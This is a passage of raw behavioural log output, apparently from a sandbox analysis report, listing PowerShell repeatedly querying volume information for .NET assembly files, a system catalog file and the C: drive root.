Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
